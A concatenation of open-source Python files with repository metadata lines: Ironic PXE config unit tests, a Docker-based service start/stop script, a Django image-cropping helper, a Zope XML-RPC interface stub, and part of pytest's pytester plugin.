'00:11:22:33:44:55:66',
'00:11:22:33:44:55:67'
]
get_macs_mock.return_value = macs
create_link_calls = [
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/tftpboot/pxelinux.cfg/01-00-11-22-33-44-55-66'),
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/tftpboot/pxelinux.cfg/01-00-11-22-33-44-55-67')
]
unlink_calls = [
mock.call('/tftpboot/pxelinux.cfg/01-00-11-22-33-44-55-66'),
mock.call('/tftpboot/pxelinux.cfg/01-00-11-22-33-44-55-67'),
]
with task_manager.acquire(self.context, self.node.uuid) as task:
pxe_utils._link_mac_pxe_configs(task)
unlink_mock.assert_has_calls(unlink_calls)
create_link_mock.assert_has_calls(create_link_calls)
@mock.patch('ironic.common.utils.create_link_without_raise', autospec=True)
@mock.patch('ironic.common.utils.unlink_without_raise', autospec=True)
@mock.patch('ironic.drivers.utils.get_node_mac_addresses', autospec=True)
def test__write_mac_ipxe_configs(self, get_macs_mock, unlink_mock,
create_link_mock):
self.config(ipxe_enabled=True, group='pxe')
macs = [
'00:11:22:33:44:55:66',
'00:11:22:33:44:55:67'
]
get_macs_mock.return_value = macs
create_link_calls = [
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/httpboot/pxelinux.cfg/00-11-22-33-44-55-66'),
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/httpboot/pxelinux.cfg/00112233445566'),
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/httpboot/pxelinux.cfg/00-11-22-33-44-55-67'),
mock.call(u'../1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
'/httpboot/pxelinux.cfg/00112233445567'),
]
unlink_calls = [
mock.call('/httpboot/pxelinux.cfg/00-11-22-33-44-55-66'),
mock.call('/httpboot/pxelinux.cfg/00112233445566'),
mock.call('/httpboot/pxelinux.cfg/00-11-22-33-44-55-67'),
mock.call('/httpboot/pxelinux.cfg/00112233445567'),
]
with task_manager.acquire(self.context, self.node.uuid) as task:
pxe_utils._link_mac_pxe_configs(task)
unlink_mock.assert_has_calls(unlink_calls)
create_link_mock.assert_has_calls(create_link_calls)
@mock.patch('ironic.common.utils.create_link_without_raise', autospec=True)
@mock.patch('ironic.common.utils.unlink_without_raise', autospec=True)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.provider',
autospec=True)
def test__link_ip_address_pxe_configs(self, provider_mock, unlink_mock,
create_link_mock):
ip_address = '10.10.0.1'
address = "aa:aa:aa:aa:aa:aa"
object_utils.create_test_port(self.context, node_id=self.node.id,
address=address)
provider_mock.get_ip_addresses.return_value = [ip_address]
create_link_calls = [
mock.call(u'1be26c0b-03f2-4d2e-ae87-c02d7f33c123/config',
u'/tftpboot/10.10.0.1.conf'),
]
with task_manager.acquire(self.context, self.node.uuid) as task:
pxe_utils._link_ip_address_pxe_configs(task, False)
unlink_mock.assert_called_once_with('/tftpboot/10.10.0.1.conf')
create_link_mock.assert_has_calls(create_link_calls)
@mock.patch('ironic.common.utils.write_to_file', autospec=True)
@mock.patch.object(pxe_utils, '_build_pxe_config', autospec=True)
@mock.patch('oslo_utils.fileutils.ensure_tree', autospec=True)
def test_create_pxe_config(self, ensure_tree_mock, build_mock,
write_mock):
build_mock.return_value = self.pxe_options_bios
with task_manager.acquire(self.context, self.node.uuid) as task:
pxe_utils.create_pxe_config(task, self.pxe_options_bios,
CONF.pxe.pxe_config_template)
build_mock.assert_called_with(self.pxe_options_bios,
CONF.pxe.pxe_config_template,
'{{ ROOT }}',
'{{ DISK_IDENTIFIER }}')
ensure_calls = [
mock.call(os.path.join(CONF.pxe.tftp_root, self.node.uuid)),
mock.call(os.path.join(CONF.pxe.tftp_root, 'pxelinux.cfg'))
]
ensure_tree_mock.assert_has_calls(ensure_calls)
pxe_cfg_file_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
write_mock.assert_called_with(pxe_cfg_file_path, self.pxe_options_bios)
@mock.patch('ironic.common.pxe_utils._link_ip_address_pxe_configs',
autospec=True)
@mock.patch('ironic.common.utils.write_to_file', autospec=True)
@mock.patch('ironic.common.pxe_utils._build_pxe_config', autospec=True)
@mock.patch('oslo_utils.fileutils.ensure_tree', autospec=True)
def test_create_pxe_config_uefi_elilo(self, ensure_tree_mock, build_mock,
write_mock, link_ip_configs_mock):
build_mock.return_value = self.pxe_options_uefi
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.properties['capabilities'] = 'boot_mode:uefi'
pxe_utils.create_pxe_config(task, self.pxe_options_uefi,
CONF.pxe.uefi_pxe_config_template)
ensure_calls = [
mock.call(os.path.join(CONF.pxe.tftp_root, self.node.uuid)),
mock.call(os.path.join(CONF.pxe.tftp_root, 'pxelinux.cfg'))
]
ensure_tree_mock.assert_has_calls(ensure_calls)
build_mock.assert_called_with(self.pxe_options_uefi,
CONF.pxe.uefi_pxe_config_template,
'{{ ROOT }}',
'{{ DISK_IDENTIFIER }}')
link_ip_configs_mock.assert_called_once_with(task, True)
pxe_cfg_file_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
write_mock.assert_called_with(pxe_cfg_file_path, self.pxe_options_uefi)
@mock.patch('ironic.common.pxe_utils._link_ip_address_pxe_configs',
autospec=True)
@mock.patch('ironic.common.utils.write_to_file', autospec=True)
@mock.patch('ironic.common.pxe_utils._build_pxe_config', autospec=True)
@mock.patch('oslo_utils.fileutils.ensure_tree', autospec=True)
def test_create_pxe_config_uefi_grub(self, ensure_tree_mock, build_mock,
write_mock, link_ip_configs_mock):
build_mock.return_value = self.pxe_options_uefi
grub_tmplte = "ironic/drivers/modules/pxe_grub_config.template"
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.properties['capabilities'] = 'boot_mode:uefi'
pxe_utils.create_pxe_config(task, self.pxe_options_uefi,
grub_tmplte)
ensure_calls = [
mock.call(os.path.join(CONF.pxe.tftp_root, self.node.uuid)),
mock.call(os.path.join(CONF.pxe.tftp_root, 'pxelinux.cfg'))
]
ensure_tree_mock.assert_has_calls(ensure_calls)
build_mock.assert_called_with(self.pxe_options_uefi,
grub_tmplte,
'(( ROOT ))',
'(( DISK_IDENTIFIER ))')
link_ip_configs_mock.assert_called_once_with(task, False)
pxe_cfg_file_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
write_mock.assert_called_with(pxe_cfg_file_path, self.pxe_options_uefi)
@mock.patch('ironic.common.utils.rmtree_without_raise', autospec=True)
@mock.patch('ironic.common.utils.unlink_without_raise', autospec=True)
def test_clean_up_pxe_config(self, unlink_mock, rmtree_mock):
address = "aa:aa:aa:aa:aa:aa"
object_utils.create_test_port(self.context, node_id=self.node.id,
address=address)
with task_manager.acquire(self.context, self.node.uuid) as task:
pxe_utils.clean_up_pxe_config(task)
unlink_mock.assert_called_once_with("/tftpboot/pxelinux.cfg/01-%s"
% address.replace(':', '-'))
rmtree_mock.assert_called_once_with(
os.path.join(CONF.pxe.tftp_root, self.node.uuid))
def test__get_pxe_mac_path(self):
mac = '00:11:22:33:44:55:66'
self.assertEqual('/tftpboot/pxelinux.cfg/01-00-11-22-33-44-55-66',
pxe_utils._get_pxe_mac_path(mac))
def test__get_pxe_mac_path_ipxe(self):
self.config(ipxe_enabled=True, group='pxe')
self.config(http_root='/httpboot', group='deploy')
mac = '00:11:22:33:AA:BB:CC'
self.assertEqual('/httpboot/pxelinux.cfg/00-11-22-33-aa-bb-cc',
pxe_utils._get_pxe_mac_path(mac))
def test__get_pxe_ip_address_path(self):
ipaddress = '10.10.0.1'
self.assertEqual('/tftpboot/10.10.0.1.conf',
pxe_utils._get_pxe_ip_address_path(ipaddress, False))
def test_get_root_dir(self):
expected_dir = '/tftproot'
self.config(ipxe_enabled=False, group='pxe')
self.config(tftp_root=expected_dir, group='pxe')
self.assertEqual(expected_dir, pxe_utils.get_root_dir())
def test_get_root_dir_ipxe(self):
expected_dir = '/httpboot'
self.config(ipxe_enabled=True, group='pxe')
self.config(http_root=expected_dir, group='deploy')
self.assertEqual(expected_dir, pxe_utils.get_root_dir())
def test_get_pxe_config_file_path(self):
self.assertEqual(os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'config'),
pxe_utils.get_pxe_config_file_path(self.node.uuid))
def test_dhcp_options_for_instance(self):
self.config(tftp_server='192.0.2.1', group='pxe')
self.config(pxe_bootfile_name='fake-bootfile', group='pxe')
expected_info = [{'opt_name': 'bootfile-name',
'opt_value': 'fake-bootfile'},
{'opt_name': 'server-ip-address',
'opt_value': '192.0.2.1'},
{'opt_name': 'tftp-server',
'opt_value': '192.0.2.1'}
]
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(expected_info,
pxe_utils.dhcp_options_for_instance(task))
def _test_get_deploy_kr_info(self, expected_dir):
node_uuid = 'fake-node'
driver_info = {
'deploy_kernel': 'glance://deploy-kernel',
'deploy_ramdisk': 'glance://deploy-ramdisk',
}
expected = {
'deploy_kernel': ('glance://deploy-kernel',
expected_dir + '/fake-node/deploy_kernel'),
'deploy_ramdisk': ('glance://deploy-ramdisk',
expected_dir + '/fake-node/deploy_ramdisk'),
}
kr_info = pxe_utils.get_deploy_kr_info(node_uuid, driver_info)
self.assertEqual(expected, kr_info)
def test_get_deploy_kr_info(self):
expected_dir = '/tftp'
self.config(tftp_root=expected_dir, group='pxe')
self._test_get_deploy_kr_info(expected_dir)
def test_get_deploy_kr_info_ipxe(self):
expected_dir = '/http'
self.config(ipxe_enabled=True, group='pxe')
self.config(http_root=expected_dir, group='deploy')
self._test_get_deploy_kr_info(expected_dir)
def test_get_deploy_kr_info_bad_driver_info(self):
self.config(tftp_root='/tftp', group='pxe')
node_uuid = 'fake-node'
driver_info = {}
self.assertRaises(KeyError,
pxe_utils.get_deploy_kr_info,
node_uuid,
driver_info)
def test_dhcp_options_for_instance_ipxe(self):
self.config(tftp_server='192.0.2.1', group='pxe')
self.config(pxe_bootfile_name='fake-bootfile', group='pxe')
self.config(ipxe_enabled=True, group='pxe')
self.config(http_url='http://192.0.3.2:1234', group='deploy')
self.config(ipxe_boot_script='/test/boot.ipxe', group='pxe')
self.config(dhcp_provider='isc', group='dhcp')
expected_boot_script_url = 'http://192.0.3.2:1234/boot.ipxe'
expected_info = [{'opt_name': '!175,bootfile-name',
'opt_value': 'fake-bootfile'},
{'opt_name': 'server-ip-address',
'opt_value': '192.0.2.1'},
{'opt_name': 'tftp-server',
'opt_value': '192.0.2.1'},
{'opt_name': 'bootfile-name',
'opt_value': expected_boot_script_url}]
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertItemsEqual(expected_info,
pxe_utils.dhcp_options_for_instance(task))
self.config(dhcp_provider='neutron', group='dhcp')
expected_boot_script_url = 'http://192.0.3.2:1234/boot.ipxe'
expected_info = [{'opt_name': 'tag:!ipxe,bootfile-name',
'opt_value': 'fake-bootfile'},
{'opt_name': 'server-ip-address',
'opt_value': '192.0.2.1'},
{'opt_name': 'tftp-server',
'opt_value': '192.0.2.1'},
{'opt_name': 'tag:ipxe,bootfile-name',
'opt_value': expected_boot_script_url}]
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertItemsEqual(expected_info,
pxe_utils.dhcp_options_for_instance(task))
@mock.patch('ironic.common.utils.rmtree_without_raise', autospec=True)
@mock.patch('ironic.common.utils.unlink_without_raise', autospec=True)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.provider')
def test_clean_up_pxe_config_uefi(self, provider_mock, unlink_mock,
rmtree_mock):
ip_address = '10.10.0.1'
address = "aa:aa:aa:aa:aa:aa"
properties = {'capabilities': 'boot_mode:uefi'}
object_utils.create_test_port(self.context, node_id=self.node.id,
address=address)
provider_mock.get_ip_addresses.return_value = [ip_address]
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.properties = properties
pxe_utils.clean_up_pxe_config(task)
unlink_calls = [
mock.call('/tftpboot/10.10.0.1.conf'),
mock.call('/tftpboot/0A0A0001.conf')
]
unlink_mock.assert_has_calls(unlink_calls)
rmtree_mock.assert_called_once_with(
os.path.join(CONF.pxe.tftp_root, self.node.uuid))
@mock.patch('ironic.common.utils.rmtree_without_raise')
@mock.patch('ironic.common.utils.unlink_without_raise')
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.provider')
def test_clean_up_pxe_config_uefi_instance_info(self,
provider_mock, unlink_mock,
rmtree_mock):
ip_address = '10.10.0.1'
address = "aa:aa:aa:aa:aa:aa"
object_utils.create_test_port(self.context, node_id=self.node.id,
address=address)
provider_mock.get_ip_addresses.return_value = [ip_address]
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.instance_info['deploy_boot_mode'] = 'uefi'
pxe_utils.clean_up_pxe_config(task)
unlink_calls = [
mock.call('/tftpboot/10.10.0.1.conf'),
mock.call('/tftpboot/0A0A0001.conf')
]
unlink_mock.assert_has_calls(unlink_calls)
rmtree_mock.assert_called_once_with(
os.path.join(CONF.pxe.tftp_root, self.node.uuid))
| redhat-openstack/ironic | ironic/tests/common/test_pxe_utils.py | Python | apache-2.0 | 22,973 |
#!/usr/bin/python
# -*- coding:utf-8 -*-
#############################################
# Flask & werkzeug HTTP Proxy Sample code.
# - Code by Jioh L. Jung (ziozzang@gmail.com)
#############################################
import ConfigParser
import os
import docker
from docker.utils import kwargs_from_env
import time
import sys
STARTED='started'
STOPPED='stopped'
STATUS='status'
class kbservices:
PREFIX='proxy_'
CONFIGFILE='cluster.ini'
DEFAULTIMAGE='canon/fakeserv:1.0'
RETRY=40
POLL_TIME=0.1
def __init__(self):
self.services=self.read_config()
self.client=self.init_docker()
self.update_services()
def get_item(self,section,item,default):
value=default
if self.Config.has_option('defaults',item):
value=self.Config.get('defaults',item)
if self.Config.has_option(section,item):
value=self.Config.get(section,item)
return value
def read_config(self):
services=dict()
self.Config = ConfigParser.ConfigParser()
self.Config.default_section='defaults'
self.Config.read(self.CONFIGFILE)
for section in self.Config.sections():
if section=='global':
continue
if section=='defaults':
continue
type=self.get_item(section,'type','service')
if type!='service':
continue
pt=self.get_item(section,'proxytype','proxy')
# TODO: figure out how to manage these too
if section in ['www','mongo','mysql']:
continue
# TODO: figure out the best way to do this.
# For now, allow everything
#if pt=='skip':
# continue
service=self.get_item(section,'urlname',section)
services[service]=dict()
services[service][STATUS]=STOPPED
services[service]['ip']=''
services[service]['port']=0
services[service]['service-port']=int(self.get_item(section,'service-port',0))
services[service]['image']=self.get_item(section,'docker-image',self.DEFAULTIMAGE)
volumes=[]
binds=dict()
for item in self.get_item(section,'docker-volumes','').split(','):
if item!='':
(volume,alias)=item.split(':')
volumes.append(alias)
binds[volume]=dict(bind=alias,mode='rw')
services[service]['volumes']=volumes
services[service]['binds']=binds
links=dict()
for item in self.get_item(section,'docker-links','').split(','):
if item!='':
(link,alias)=item.split(':')
links[link]=alias
services[service]['links']=links
services[service]['section']=section
services[service]['name']=service
services[service]['container']=''
return services
def init_docker(self):
if 'DOCKER_HOST' in os.environ:
self.IP=os.environ['DOCKER_HOST'].replace('tcp://','').split(':')[0]
else:
self.IP=''
kwargs = kwargs_from_env()
if 'tls' in kwargs:
kwargs['tls'].assert_hostname = False
client = docker.Client(**kwargs)
return client
def isaservice(self,service):
if service in self.services:
return True
else:
return False
def isstarted(self,service):
if service in self.services and self.services[service][STATUS]==STARTED:
return True
else:
return False
def get_list(self):
return self.services.keys()
def get_hostport(self,service):
if service in self.services:
sr=self.services[service]
if sr[STATUS]==STOPPED:
if not self.start_service(service):
return (None,None)
return (sr['ip'],sr['port'])
else:
return (None,None)
def update_service(self,service,id):
self.services[service]['container']=id
ct=self.client.inspect_container(id)
if ct['State']['Running']==False:
self.client.remove_container(id)
self.services[service][STATUS]=STOPPED
return self.services[service][STATUS]
if self.IP == '':
self.services[service]['ip']=ct['NetworkSettings']['IPAddress']
self.services[service]['port']=self.services[service]['service-port']
else:
self.services[service]['ip']=self.IP
self.services[service]['port']=self.services[service]['service-port']
self.services[service][STATUS]=STARTED
return self.services[service][STATUS]
def update_services(self):
for cont in self.client.containers(all=True):
if 'Names' in cont and cont['Names'] is not None:
for name in cont['Names']:
service=name.replace('/'+self.PREFIX,'')
if service in self.services:
self.update_service(service,cont['Id'])
def start_service(self,service):
self.update_services()
if service not in self.services:
return False
sr=self.services[service]
if sr[STATUS]==STARTED:
return True
image=sr['image']
port=sr['service-port']
host_config=docker.utils.create_host_config(port_bindings={port:port},
links=sr['links'],
binds=sr['binds'])
try:
container = self.client.create_container( image=image,
name=self.PREFIX+sr['name'],
detach=True,
ports=[port],
volumes=sr['volumes'],
environment=dict(PORT=port,MYSERVICES=sr['section']),
host_config=host_config)
except:
print "Unexpected error creating container:", sys.exc_info()[0]
raise
id=container.get('Id')
try:
response = self.client.start(container=id)
except:
print "Unexpected error starting container:", sys.exc_info()[0]
raise
retry=self.RETRY
while retry>0:
retry-=1
self.update_service(service,id)
if sr[STATUS]==STARTED:
return True
time.sleep(self.POLL_TIMESLEEP)
return False
def kill_service(self,service):
self.update_services()
if service in self.services:
sr=self.services[service]
id=sr['container']
if sr[STATUS]!=STOPPED:
self.client.kill(id)
retry=self.RETRY
while retry>0:
retry-=1
self.update_service(service,id)
if sr[STATUS]==STOPPED:
return True
time.sleep(self.POLL_TIME)
return False
if __name__ == '__main__':
kbs=kbservices()
if len(sys.argv)==3 and sys.argv[1]=='start':
service=sys.argv[2]
print "Starting "+service
kbs.start_service(service)
elif len(sys.argv)==3 and sys.argv[1]=='stop':
service=sys.argv[2]
print "Stop "+service
if service=='all':
for s in kbs.get_list():
kbs.kill_service(s)
else:
kbs.kill_service(service)
elif len(sys.argv)==3 and sys.argv[1]=='restart':
service=sys.argv[2]
print "Restart "+service
kbs.kill_service(service)
kbs.start_service(service)
elif len(sys.argv)==2 and sys.argv[1]=='status':
print
print '%-30s %5s %-25s'%('Service','Status','Host:Port')
print '==========================================================='
for s in sorted(kbs.get_list()):
status=kbs.isstarted(s)
hp=''
if status==True:
(h,p)=kbs.get_hostport(s)
if (h,p) != (None,None):
hp='%s:%d'%(h,p)
print '%-30s %5s %-25s'%(s,status,hp)
else:
print "Usage: kbservices <start,stop,stautus> [service]"
| kbaseIncubator/kbrouter | kbservices.py | Python | mit | 7,353 |
import base64
from io import BytesIO
import os
from PIL import Image
class ImageProcessor:
def __init__(self,request):
img64 = request.POST.get('imgUrl')
img64 = img64[img64.find(',')+1:]
self.img = Image.open(BytesIO(base64.b64decode(img64)))
self.initDim = (int(request.POST.get('imgInitW')), int(request.POST.get('imgInitH')))
self.scaleDim = (int(float(request.POST.get('imgW'))), int(float(request.POST.get('imgH'))))
self.cropDim = (int(float(request.POST.get('cropW'))), int(float(request.POST.get('cropH'))))
self.corner = (int(float(request.POST.get('imgX1'))), int(float(request.POST.get('imgY1'))))
self.rotation = request.POST.get("rotation")
if '-' in request.POST.get("rotation"):
self.angle = int(request.POST.get("rotation")[1:])
else:
self.angle = 360 - int(request.POST.get("rotation"))#rotation in pil is counterclockwise
def CropImage(self):
self.img = self.img.resize(self.scaleDim, Image.LANCZOS)
self.img = self.img.rotate(self.angle)
self.img = self.img.crop((self.corner[0], self.corner[1] , self.cropDim[0] + self.corner[0], self.cropDim[1] + self.corner[1]))
def SaveImage(self, filename):
full_path = os.path.join("/var/www/html/ShotForTheHeart/media/", filename)
try:
self.img.save(full_path)
return True
except:
return False
def LoadImage(self, path):
filename = "/var/www/html/ShotForTheHeart/" + path
return base64.b64encode(open(filename,"rb").read())
| knoopr/ShotForTheHeart | ShotForTheHeart/models/ImageProcessor.py | Python | gpl-2.0 | 1,458 |
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""XML-RPC Publisher Interfaces
$Id: xmlrpc.py 27316 2004-08-27 23:11:03Z jim $
"""
from zope.component.interfaces import IView
from zope.component.interfaces import IPresentation
class IXMLRPCPresentation(IPresentation):
"""XML-RPC presentation
"""
class IXMLRPCView(IXMLRPCPresentation, IView):
"""XMLRPC View"""
| Donkyhotay/MoonPy | zope/app/publisher/interfaces/xmlrpc.py | Python | gpl-3.0 | 973 |
""" (disabled by default) support for testing pytest and pytest plugins. """
import gc
import sys
import traceback
import os
import codecs
import re
import time
import platform
from fnmatch import fnmatch
import subprocess
import py
import pytest
from py.builtin import print_
from _pytest.main import Session, EXIT_OK
def pytest_addoption(parser):
# group = parser.getgroup("pytester", "pytester (self-tests) options")
parser.addoption('--lsof',
action="store_true", dest="lsof", default=False,
help=("run FD checks if lsof is available"))
parser.addoption('--runpytest', default="inprocess", dest="runpytest",
choices=("inprocess", "subprocess", ),
help=("run pytest sub runs in tests using an 'inprocess' "
"or 'subprocess' (python -m main) method"))
def pytest_configure(config):
# This might be called multiple times. Only take the first.
global _pytest_fullpath
try:
_pytest_fullpath
except NameError:
_pytest_fullpath = os.path.abspath(pytest.__file__.rstrip("oc"))
_pytest_fullpath = _pytest_fullpath.replace("$py.class", ".py")
if config.getvalue("lsof"):
checker = LsofFdLeakChecker()
if checker.matching_platform():
config.pluginmanager.register(checker)
class LsofFdLeakChecker(object):
def get_open_files(self):
out = self._exec_lsof()
open_files = self._parse_lsof_output(out)
return open_files
def _exec_lsof(self):
pid = os.getpid()
return py.process.cmdexec("lsof -Ffn0 -p %d" % pid)
def _parse_lsof_output(self, out):
def isopen(line):
return line.startswith('f') and ("deleted" not in line and
'mem' not in line and "txt" not in line and 'cwd' not in line)
open_files = []
for line in out.split("\n"):
if isopen(line):
fields = line.split('\0')
fd = fields[0][1:]
filename = fields[1][1:]
if filename.startswith('/'):
open_files.append((fd, filename))
return open_files
def matching_platform(self):
try:
py.process.cmdexec("lsof -v")
except (py.process.cmdexec.Error, UnicodeDecodeError):
# cmdexec may raise UnicodeDecodeError on Windows systems
# with locale other than english:
# https://bitbucket.org/pytest-dev/py/issues/66
return False
else:
return True
@pytest.hookimpl(hookwrapper=True, tryfirst=True)
def pytest_runtest_item(self, item):
lines1 = self.get_open_files()
yield
if hasattr(sys, "pypy_version_info"):
gc.collect()
lines2 = self.get_open_files()
new_fds = set([t[0] for t in lines2]) - set([t[0] for t in lines1])
leaked_files = [t for t in lines2 if t[0] in new_fds]
if leaked_files:
error = []
error.append("***** %s FD leakage detected" % len(leaked_files))
error.extend([str(f) for f in leaked_files])
error.append("*** Before:")
error.extend([str(f) for f in lines1])
error.append("*** After:")
error.extend([str(f) for f in lines2])
error.append(error[0])
error.append("*** function %s:%s: %s " % item.location)
pytest.fail("\n".join(error), pytrace=False)
# XXX copied from execnet's conftest.py - needs to be merged
winpymap = {
'python2.7': r'C:\Python27\python.exe',
'python2.6': r'C:\Python26\python.exe',
'python3.1': r'C:\Python31\python.exe',
'python3.2': r'C:\Python32\python.exe',
'python3.3': r'C:\Python33\python.exe',
'python3.4': r'C:\Python34\python.exe',
'python3.5': r'C:\Python35\python.exe',
}
def getexecutable(name, cache={}):
try:
return cache[name]
except KeyError:
executable = py.path.local.sysfind(name)
if executable:
if name == "jython":
import subprocess
popen = subprocess.Popen([str(executable), "--version"],
universal_newlines=True, stderr=subprocess.PIPE)
out, err = popen.communicate()
if not err or "2.5" not in err:
executable = None
if "2.5.2" in err:
executable = None # http://bugs.jython.org/issue1790
cache[name] = executable
return executable
@pytest.fixture(params=['python2.6', 'python2.7', 'python3.3', "python3.4",
'pypy', 'pypy3'])
def anypython(request):
name = request.param
executable = getexecutable(name)
if executable is None:
if sys.platform == "win32":
executable = winpymap.get(name, None)
if executable:
executable = py.path.local(executable)
if executable.check():
return executable
pytest.skip("no suitable %s found" % (name,))
return executable
# used at least by pytest-xdist plugin
@pytest.fixture
def _pytest(request):
""" Return a helper which offers a gethookrecorder(hook)
method which returns a HookRecorder instance which helps
to make assertions about called hooks.
"""
return PytestArg(request)
class PytestArg:
def __init__(self, request):
self.request = request
def gethookrecorder(self, hook):
hookrecorder = HookRecorder(hook._pm)
self.request.addfinalizer(hookrecorder.finish_recording)
return hookrecorder
def get_public_names(l):
"""Only return names from iterator l without a leading underscore."""
return [x for x in l if x[0] != "_"]
class ParsedCall:
def __init__(self, name, kwargs):
self.__dict__.update(kwargs)
self._name = name
def __repr__(self):
d = self.__dict__.copy()
del d['_name']
return "<ParsedCall %r(**%r)>" %(self._name, d)
class HookRecorder:
"""Record all hooks called in a plugin manager.
This wraps all the hook calls in the plugin manager, recording
each call before propagating the normal calls.
"""
def __init__(self, pluginmanager):
self._pluginmanager = pluginmanager
self.calls = []
def before(hook_name, hook_impls, kwargs):
self.calls.append(ParsedCall(hook_name, kwargs))
def after(outcome, hook_name, hook_impls, kwargs):
pass
self._undo_wrapping = pluginmanager.add_hookcall_monitoring(before, after)
def finish_recording(self):
self._undo_wrapping()
def getcalls(self, names):
if isinstance(names, str):
names = names.split()
return [call for call in self.calls if call._name in names]
def assert_contains(self, entries):
__tracebackhide__ = True
i = 0
entries = list(entries)
backlocals = sys._getframe(1).f_locals
while entries:
name, check = entries.pop(0)
for ind, call in enumerate(self.calls[i:]):
if call._name == name:
print_("NAMEMATCH", name, call)
if eval(check, backlocals, call.__dict__):
print_("CHECKERMATCH", repr(check), "->", call)
else:
print_("NOCHECKERMATCH", repr(check), "-", call)
continue
i += ind + 1
break
print_("NONAMEMATCH", name, "with", call)
else:
pytest.fail("could not find %r check %r" % (name, check))
def popcall(self, name):
__tracebackhide__ = True
for i, call in enumerate(self.calls):
if call._name == name:
del self.calls[i]
return call
lines = ["could not find call %r, in:" % (name,)]
lines.extend([" %s" % str(x) for x in self.calls])
pytest.fail("\n".join(lines))
def getcall(self, name):
l = self.getcalls(name)
assert len(l) == 1, (name, l)
return l[0]
# functionality for test reports
def getreports(self,
names="pytest_runtest_logreport pytest_collectreport"):
return [x.report for x in self.getcalls(names)]
def matchreport(self, inamepart="",
names="pytest_runtest_logreport pytest_collectreport", when=None):
""" return a testreport whose dotted import path matches """
l = []
for rep in self.getreports(names=names):
try:
if not when and rep.when != "call" and rep.passed:
# setup/teardown passing reports - let's ignore those
continue
except AttributeError:
pass
if when and getattr(rep, 'when', None) != when:
continue
if not inamepart or inamepart in rep.nodeid.split("::"):
l.append(rep)
if not l:
raise ValueError("could not find test report matching %r: "
"no test reports at all!" % (inamepart,))
if len(l) > 1:
raise ValueError(
"found 2 or more testreports matching %r: %s" %(inamepart, l))
return l[0]
def getfailures(self,
names='pytest_runtest_logreport pytest_collectreport'):
return [rep for rep in self.getreports(names) if rep.failed]
def getfailedcollections(self):
return self.getfailures('pytest_collectreport')
def listoutcomes(self):
passed = []
skipped = []
failed = []
for rep in self.getreports(
"pytest_collectreport pytest_runtest_logreport"):
if rep.passed:
if getattr(rep, "when", None) == "call":
passed.append(rep)
elif rep.skipped:
skipped.append(rep)
elif rep.failed:
failed.append(rep)
return passed, skipped, failed
def countoutcomes(self):
return [len(x) for x in self.listoutcomes()]
def assertoutcome(self, passed=0, skipped=0, failed=0):
realpassed, realskipped, realfailed = self.listoutcomes()
assert passed == len(realpassed)
assert skipped == len(realskipped)
assert failed == len(realfailed)
def clear(self):
self.calls[:] = []
@pytest.fixture
def linecomp(request):
return LineComp()
def pytest_funcarg__LineMatcher(request):
return LineMatcher
@pytest.fixture
def testdir(request, tmpdir_factory):
return Testdir(request, tmpdir_factory)
rex_outcome = re.compile("(\d+) (\w+)")
class RunResult:
"""The result of running a command.
Attributes:
:ret: The return value.
:outlines: List of lines captured from stdout.
:errlines: List of lines captures from stderr.
:stdout: :py:class:`LineMatcher` of stdout, use ``stdout.str()`` to
reconstruct stdout or the commonly used
``stdout.fnmatch_lines()`` method.
:stderrr: :py:class:`LineMatcher` of stderr.
:duration: Duration in seconds.
"""
def __init__(self, ret, outlines, errlines, duration):
self.ret = ret
self.outlines = outlines
self.errlines = errlines
self.stdout = LineMatcher(outlines)
self.stderr = LineMatcher(errlines)
self.duration = duration
def parseoutcomes(self):
""" Return a dictionary of outcomestring->num from parsing
the terminal output that the test process produced."""
for line in reversed(self.outlines):
if 'seconds' in line:
outcomes = rex_outcome.findall(line)
if outcomes:
d = {}
for num, cat in outcomes:
d[cat] = int(num)
return d
def assert_outcomes(self, passed=0, skipped=0, failed=0):
""" assert that the specified outcomes appear with the respective
numbers (0 means it didn't occur) in the text output from a test run."""
d = self.parseoutcomes()
assert passed == d.get("passed", 0)
assert skipped == d.get("skipped", 0)
assert failed == d.get("failed", 0)
class Testdir:
"""Temporary test directory with tools to test/run py.test itself.
This is based on the ``tmpdir`` fixture but provides a number of
methods which aid with testing py.test itself. Unless
:py:meth:`chdir` is used all methods will use :py:attr:`tmpdir` as
current working directory.
Attributes:
:tmpdir: The :py:class:`py.path.local` instance of the temporary
directory.
:plugins: A list of plugins to use with :py:meth:`parseconfig` and
:py:meth:`runpytest`. Initially this is an empty list but
plugins can be added to the list. The type of items to add to
the list depend on the method which uses them so refer to them
for details.
"""
def __init__(self, request, tmpdir_factory):
self.request = request
# XXX remove duplication with tmpdir plugin
basetmp = tmpdir_factory.ensuretemp("testdir")
name = request.function.__name__
for i in range(100):
try:
tmpdir = basetmp.mkdir(name + str(i))
except py.error.EEXIST:
continue
break
self.tmpdir = tmpdir
self.plugins = []
self._savesyspath = (list(sys.path), list(sys.meta_path))
